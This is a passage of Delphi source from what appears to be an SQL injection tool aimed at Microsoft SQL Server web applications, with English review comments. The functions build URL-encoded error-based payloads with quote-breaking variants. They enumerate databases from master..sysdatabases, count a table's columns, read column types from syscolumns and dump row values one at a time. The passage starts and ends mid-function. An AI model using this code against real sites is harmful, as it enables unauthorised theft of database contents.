begin
Application.MessageBox(pchar('获取用户表列数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//*********************
try
result:=strtoint(sCount);
except
result:=0;
end;
//*********************
end;
//**********************************************************
//**********************************************************
//函数:获取一个表的列数
// GetColumnCountByDb: asks the remote SQL Server, through a crafted URL, how many
// columns the table TableName has, and returns that count as an integer.
//   str_url   - base URL; the URL-encoded SQL fragment is appended to it.
//   str_db    - database name used to qualify [sysobjects] in the fragment.
//   TableName - table name compared against sysobjects.name.
// Returns strtoint() of the text delivered by define_unit.GetURLMsg, or 0 when
// that text is not a valid integer.
// NOTE(review): Result is never assigned on the Inject_methord=0 exit path.
// NOTE(review): for log review / WAF rules, the request built here carries
// "And (select char(94)+cast(count(1) as varchar(80))+char(94) from ..[syscolumns] ..)>0"
// in URL-encoded form inside the query string.
function GetColumnCountByDb(str_url:string;str_db:string;TableName:string):integer;
var
sCount:string;
str_ext:string;
URL:string;
begin
// The fragment joins syscolumns and sysobjects on id and counts the rows whose
// object name equals TableName; the count is cast to varchar and wrapped in
// char(94) ('^') before being compared with 0.
// [syscolumns] is qualified with FDbName (declared outside this block), [sysobjects] with str_db.
str_ext:='%20And%20(select%20char(94)%2Bcast(count(1)%20as%20varchar(80))%2Bchar(94)%20from%20['
+FDbName+']..[syscolumns]%20A,['+str_db+']..[sysobjects]%20B%20where%20A.id=B.id%20and%20B.name='''+TableName+''')>0';
//*********************
// Inject_methord (declared outside this block) selects how the fragment is attached to the URL.
case Inject_methord of
// 0: unknown method - warn the user and leave without building a request.
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
// 1: fragment appended to the URL as-is.
1: begin
URL:=str_url+str_ext;
end;
// 2: fragment preceded by a single quote and followed by "And ''='".
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
// 3: fragment preceded by "%'" (%25 is an encoded percent sign) and followed by "And '%'='".
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
// GetURLMsg is defined in define_unit and is not visible here; presumably it sends
// the request and returns the text found between the '^' markers - TODO confirm.
try
sCount:=define_unit.GetURLMsg(URL);
except
on E:Exception do
begin
// Only reports the error; execution continues with sCount unchanged.
Application.MessageBox(pchar('获取用户表列数时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
//*********************
// Any non-numeric reply (including an empty one) is reported to the caller as 0.
try
result:=strtoint(sCount);
except
result:=0;
end;
//*********************
end;
//**********************************************************
//函数:获取列的数据类型
// GetColumType: requests the xtype value of column CName in table TableName from
// the remote SQL Server and translates the numeric xtype into a type name.
//   str_url   - base URL; must not be empty.
//   CName     - column name compared against syscolumns.name.
//   TableName - table name compared against sysobjects.name.
// Returns the mapped type name, or the raw text from define_unit.GetURLMsg when no
// mapping matches.
// NOTE(review): Result is not assigned on the three exit paths nor when an
// exception is caught.
// NOTE(review): for log review / WAF rules, the request carries a URL-encoded
// "And (select Top 1 char(94)+cast(B.xtype as varchar(80))+char(94) from ..[sysobjects] A,..[syscolumns] B ..)>0".
function GetColumType(str_url:string;CName:string;TableName:string):string;
var
ColumName:string;
str_ext:string;
URL:string;
begin
//*********************
// Guard: a base URL is required.
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
// Guard: the database name is taken from the main form's edit box and must be set.
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
// Side effect: overwrites FDbName, which is declared outside this function.
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
//*********************
try
// Fragment: first xtype of the column, cast to varchar and wrapped in char(94) ('^'),
// selected from sysobjects joined to syscolumns on id, then compared with 0.
str_ext:='%20And%20(select%20Top%201%20char(94)%2Bcast(B.xtype%20as%20varchar(80))%2Bchar(94)'+
'%20from%20['+FDbName+']..[sysobjects]%20A,['+FDbName+']..[syscolumns]%20B%20where%20A.id=B.id%20and%20A.name='''+TableName+'''%20and%20B.name='''+CName+''')>0';
//*********************
// Inject_methord (declared outside this block) selects how the fragment is attached to the URL.
case Inject_methord of
// 0: unknown method - warn and leave.
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
// 1: fragment appended as-is.
1: begin
URL:=str_url+str_ext;
end;
// 2: fragment preceded by a single quote and followed by "And ''='".
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
// 3: fragment preceded by "%'" and followed by "And '%'='".
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
// GetURLMsg is defined elsewhere; presumably it returns the text between the '^' markers - TODO confirm.
ColumName:=define_unit.GetURLMsg(URL);
// Translate the numeric xtype into a type name. The checks run in sequence, and
// once one matches ColumName holds a name, so no later numeric comparison can match.
if ColumName='127' then
ColumName:='bigint';
if ColumName='173' then
ColumName:='binary';
if ColumName='104' then
ColumName:='bit';
if ColumName='175' then
ColumName:='char';
if ColumName='61' then
ColumName:='datetime';
if ColumName='106' then
ColumName:='decimal';
// NOTE(review): unreachable - '175' was already replaced by 'char' above.
if ColumName='175' then
ColumName:='empid';
if ColumName='62' then
ColumName:='float';
if ColumName='167' then
ColumName:='varchar';
if ColumName='34' then
ColumName:='image';
if ColumName='56' then
ColumName:='int';
if ColumName='60' then
ColumName:='money';
if ColumName='239' then
ColumName:='nchar';
if ColumName='99' then
ColumName:='ntext';
if ColumName='108' then
ColumName:='numeric';
if ColumName='231' then
ColumName:='nvarchar';
if ColumName='59' then
ColumName:='real';
if ColumName='58' then
ColumName:='smalldatetime';
if ColumName='52' then
ColumName:='smallint';
if ColumName='122' then
ColumName:='smallmoney';
if ColumName='98' then
ColumName:='sql_variant';
// NOTE(review): unreachable - '231' was already replaced by 'nvarchar' above.
if ColumName='231' then
ColumName:='sysname';
if ColumName='35' then
ColumName:='text';
// NOTE(review): unreachable - '167' was already replaced by 'varchar' above.
if ColumName='167' then
ColumName:='tid';
if ColumName='189' then
ColumName:='timestamp';
if ColumName='48' then
ColumName:='tinyint';
if ColumName='36' then
ColumName:='uniqueidentifier';
if ColumName='165' then
ColumName:='varbinary';
// NOTE(review): unreachable duplicate of the earlier '167' check.
if ColumName='167' then
ColumName:='varchar';
result:= ColumName;
except
on E:exception do
begin
// Only reports the error to the user; nothing is returned in this case.
Application.MessageBox(pchar('获取用户表列数据类型时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
end;
end;
end;
//**********************************************************
// GetData: builds a URL whose SQL fragment selects one value of ColumnName from
// [FDbName]..[TableName] and returns the text delivered by define_unit.GetURLMsg.
//   str_url     - base URL; must not be empty.
//   TableName   - table read by the inner select.
//   iTop        - row limit of the inner "select top N".
//   ColumnName  - column whose value is cast to varchar(8000) and returned.
//   ColumnNames - columns listed in the inner select and in both ORDER BY clauses.
// The database name is read from Form_main.suiEdit_dbname and stored in FDbName
// (declared outside this function).
// NOTE(review): Result is not assigned on the three exit paths.
// NOTE(review): for log review / WAF rules, the request carries a URL-encoded
// nested "select top 1 ... from (select top N ...) as as_TableName order by ..."
// with char(94) markers inside the query string.
function GetData(str_url:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
var
str:string;
str1:string;
str2:string;
str3:string;
str4:string;
str5:string;
str6:string;
str7:string;
str8:string;
str9:string;
i:integer;
str_msg:string;
str_ext:string;
URL:string;
begin
//*********************
// Guard: a base URL is required.
if str_url='' then
begin
Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
// Guard: the database name comes from the main form and must be set.
if Form_main.suiEdit_dbname.Text='' then
begin
Application.MessageBox(pchar('当前数据库名为空,不能猜解表名'),pchar('警告'),mb_ok+mb_iconinformation);
exit;
end;
FDbName:=Form_main.suiEdit_dbname.Text;
//*********************
// str1..str9 are the pieces of the fragment, concatenated in order further down.
// str1/str2: outer "select top 1" of ColumnName, cast to varchar(8000), wrapped in char(94) ('^').
str1:='And%20(select%20top%201%20';
str2:='char(94)%2Bcast('+ColumnName+'%20as%20varchar(8000))%2Bchar(94)'+'%20';
// str3: start of the inner "select top iTop".
str3:='%20from%20(%20select%20top%20'+inttostr(iTop)+'%20';
// str4: comma-separated list of ColumnNames for the inner select (empty if the list is empty).
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str4:=ColumnNames.Strings[i-1]
else
str4:=str4+','+ColumnNames.Strings[i-1];
end;
str5:='%20from%20['+FDbName+']..['+TableName+']%20order%20by%20';
// str6: inner ORDER BY - odd positions "desc", even positions "asc".
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str6:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str6:=str6+','+ColumnNames.Strings[i-1]+'%20asc'
else
str6:=str6+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
str7:='%20)%20as%20as_TableName%20order%20by%20';
// str8: outer ORDER BY - the same columns with every direction reversed
// relative to str6, so the outer "top 1" picks the last row of the inner result.
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str8:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str8:=str8+','+ColumnNames.Strings[i-1]+'%20desc'
else
str8:=str8+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
str9:='%20)>0';
str:=str1+str2+str3+str4+str5+str6+str7+str8+str9;
str_ext:=str;
//*********************
// Inject_methord (declared outside this block) selects how the fragment is attached to the URL.
case Inject_methord of
// 0: unknown method - warn and leave.
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
// 1: fragment appended as-is (unlike the other builders in this file, str1 has no leading %20).
1: begin
URL:=str_url+str_ext;
end;
// 2: fragment preceded by a single quote and followed by "And ''='".
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
// 3: fragment preceded by "%'" and followed by "And '%'='".
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
// GetURLMsg is defined elsewhere; presumably it returns the text between the '^' markers - TODO confirm.
try
str_msg:=define_unit.GetURLMsg(URL);
result:=str_msg;
except on E:Exception do
begin
Application.MessageBox(pchar('获取表数据时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
// str_msg has not been assigned when GetURLMsg raised, so this returns its initial value.
result:=str_msg;
end;
end;
//*********************
end;
//**********************************************************
//**********************************************************
// GetDataByDb: same request builder as GetData, but the database name is passed in
// as DbName instead of being read from the main form.
//   str_url     - base URL the fragment is appended to (not checked for emptiness here).
//   DbName      - database name used to qualify TableName.
//   TableName   - table read by the inner select.
//   iTop        - row limit of the inner "select top N".
//   ColumnName  - column whose value is cast to varchar(8000) and returned.
//   ColumnNames - columns listed in the inner select and in both ORDER BY clauses.
// Returns the text delivered by define_unit.GetURLMsg.
// NOTE(review): Result is not assigned on the Inject_methord=0 exit path.
// NOTE(review): for log review / WAF rules, the request carries a URL-encoded
// nested "select top 1 ... from (select top N ...) as as_TableName order by ..."
// with char(94) markers inside the query string.
function GetDataByDb(str_url:string;DbName:string;TableName:string;iTop:integer;ColumnName:string;ColumnNames:TStringList):string;
var
str:string;
str1:string;
str2:string;
str3:string;
str4:string;
str5:string;
str6:string;
str7:string;
str8:string;
str9:string;
i:integer;
str_msg:string;
str_ext:string;
URL:string;
begin
//*********************
// str1..str9 are the pieces of the fragment, concatenated in order further down.
// str1/str2: outer "select top 1" of ColumnName, cast to varchar(8000), wrapped in char(94) ('^').
str1:='And%20(select%20top%201%20';
str2:='char(94)%2Bcast('+ColumnName+'%20as%20varchar(8000))%2Bchar(94)'+'%20';
// str3: start of the inner "select top iTop".
str3:='%20from%20(%20select%20top%20'+inttostr(iTop)+'%20';
// str4: comma-separated list of ColumnNames for the inner select (empty if the list is empty).
for i:=1 to ColumnNames.Count do
begin
if i=1 then
str4:=ColumnNames.Strings[i-1]
else
str4:=str4+','+ColumnNames.Strings[i-1];
end;
str5:='%20from%20['+DbName+']..['+TableName+']%20order%20by%20';
// str6: inner ORDER BY - odd positions "desc", even positions "asc".
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str6:=ColumnNames.Strings[i-1]+'%20desc'
else
begin
if (i mod 2)=0 then
str6:=str6+','+ColumnNames.Strings[i-1]+'%20asc'
else
str6:=str6+','+ColumnNames.Strings[i-1]+'%20desc';
end;
end;
str7:='%20)%20as%20as_TableName%20order%20by%20';
// str8: outer ORDER BY - the same columns with every direction reversed
// relative to str6, so the outer "top 1" picks the last row of the inner result.
for i:=1 to ColumnNames.Count do
begin
if (i=1) then
str8:=ColumnNames.Strings[i-1]+'%20asc'
else
begin
if (i mod 2)=0 then
str8:=str8+','+ColumnNames.Strings[i-1]+'%20desc'
else
str8:=str8+','+ColumnNames.Strings[i-1]+'%20asc';
end;
end;
str9:='%20)>0';
str:=str1+str2+str3+str4+str5+str6+str7+str8+str9;
str_ext:=str;
//*********************
// Inject_methord (declared outside this block) selects how the fragment is attached to the URL.
case Inject_methord of
// 0: unknown method - warn and leave.
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
// 1: fragment appended as-is.
1: begin
URL:=str_url+str_ext;
end;
// 2: fragment preceded by a single quote and followed by "And ''='".
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
// 3: fragment preceded by "%'" and followed by "And '%'='".
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
//*********************
// GetURLMsg is defined elsewhere; presumably it returns the text between the '^' markers - TODO confirm.
try
str_msg:=define_unit.GetURLMsg(URL);
result:=str_msg;
except on E:Exception do
begin
Application.MessageBox(pchar('获取表数据时出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);
// str_msg has not been assigned when GetURLMsg raised, so this returns its initial value.
result:=str_msg;
end;
end;
//*********************
end;
//**********************************************************
function GetDatabaseName(str_url:string;iTop:integer):string;
var
i:integer;
str_ext:string;
URL:string;
begin
//*********************
if str_url='' then
begin
//Application.MessageBox(pchar('注入地址不能为空,不能注入'),'警告',mb_ok+mb_iconinformation);
exit;
end;
//*********************
str_ext:='%20And%20(select%20top%201%20char(94)%2Bname%2Bchar(94)%20from%20(select%20top%20'
+inttostr(iTop)+'%20name,dbid%20from%20[master]..[sysdatabases]%20order%20by%20name%20asc,dbid%20desc%20)%20as%20T%20order%20by%20name%20desc,dbid%20asc)>0';
case Inject_methord of
0: begin
Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;